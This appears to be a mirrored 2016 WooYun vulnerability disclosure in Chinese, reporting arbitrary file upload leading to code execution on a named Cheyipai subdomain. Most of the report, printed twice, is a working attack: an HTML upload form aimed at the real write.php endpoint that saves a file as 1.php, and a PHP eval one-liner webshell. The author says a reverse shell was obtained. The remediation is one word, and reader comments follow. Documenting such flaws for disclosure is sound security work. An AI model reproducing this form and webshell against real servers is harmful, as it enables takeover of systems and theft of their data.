车易拍某站Getshell

admin 2017年4月4日11:19:57评论395 views字数 240阅读0分48秒阅读模式
摘要

2016-03-28: 细节已通知厂商并且等待厂商处理中
2016-03-28: 厂商已查看当前漏洞内容,细节仅向厂商公开
2016-04-02: 厂商已经主动忽略漏洞,细节向公众公开

漏洞概要 关注数(14) 关注此漏洞

缺陷编号: WooYun-2016-189437

漏洞标题: 车易拍某站Getshell

相关厂商: cheyipai.com

漏洞作者: 荒废的腰子

提交时间: 2016-03-28 11:03

公开时间: 2016-04-02 11:10

漏洞类型: 文件上传导致任意代码执行

危害等级: 高

自评Rank: 15

漏洞状态: 漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 任意文件上传 getshell 任意文件上传

1人收藏


漏洞详情

披露状态:

2016-03-28: 细节已通知厂商并且等待厂商处理中
2016-03-28: 厂商已查看当前漏洞内容,细节仅向厂商公开
2016-04-02: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

biubiubiu~

详细说明:

存在可以上传文件的地方

http://imo.cheyipai.com/file/NDisk/write.php

code 区域
<!DOCTYPE html>
<html>

<body>
<form action="http://imo.cheyipai.com/file/NDisk/write.php" method="post" enctype ="multipart/form-data">

<input name="name" type="file" />

<input name="filename" type="hidden" value="1.php"/>

<input name="cid" type="hidden"value="/"/>

<input type="submit" name="Submit" value="Go"/>

</form>
</body>
</html>

上传一句话木马

<?php echo ('papapa');eval($_POST['c'])?>

车易拍某站Getshell

成功反弹shell

车易拍某站Getshell

漏洞证明:

存在可以上传文件的地方

http://imo.cheyipai.com/file/NDisk/write.php

code 区域
<!DOCTYPE html>
<html>

<body>
<form action="http://imo.cheyipai.com/file/NDisk/write.php" method="post" enctype ="multipart/form-data">

<input name="name" type="file" />

<input name="filename" type="hidden" value="1.php"/>

<input name="cid" type="hidden"value="/"/>

<input type="submit" name="Submit" value="Go"/>

</form>
</body>
</html>

上传一句话木马

<?php echo ('papapa');eval($_POST['c'])?>

车易拍某站Getshell

成功反弹shell

车易拍某站Getshell

修复方案:

升级

版权声明:转载请注明来源 荒废的腰子@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-04-02 11:10

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分


评价

  1. 2016-03-28 11:15 | 奶嘴 ( 普通白帽子 | Rank:414 漏洞数:110 | 17岁的毛孩 有些厂商故意加你好友,和你聊...)

    1

    大叔

  2. 2016-04-03 14:47 | smlight ( 路人 | Rank:4 漏洞数:1 | 蒟蒻大学森)

    1

    现在都流行修复完了点个无影响?

  3. 2016-04-03 18:37 | 荒废的腰子 ( 普通白帽子 | Rank:264 漏洞数:31 | bug is my best friend)

    1

    @smlight 现在基本都是这个节奏

  4. 2016-04-05 18:56 | Frank Dell ( 路人 | Rank:25 漏洞数:3 | orz)

    1

    认识车易拍是通过 315 晚会曝光

  5. 2016-04-08 09:50 | 百晓生 ( 实习白帽子 | Rank:95 漏洞数:25 | 我的时代,我做主)

    1

    文件上传后的位置是咋找的呢?

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin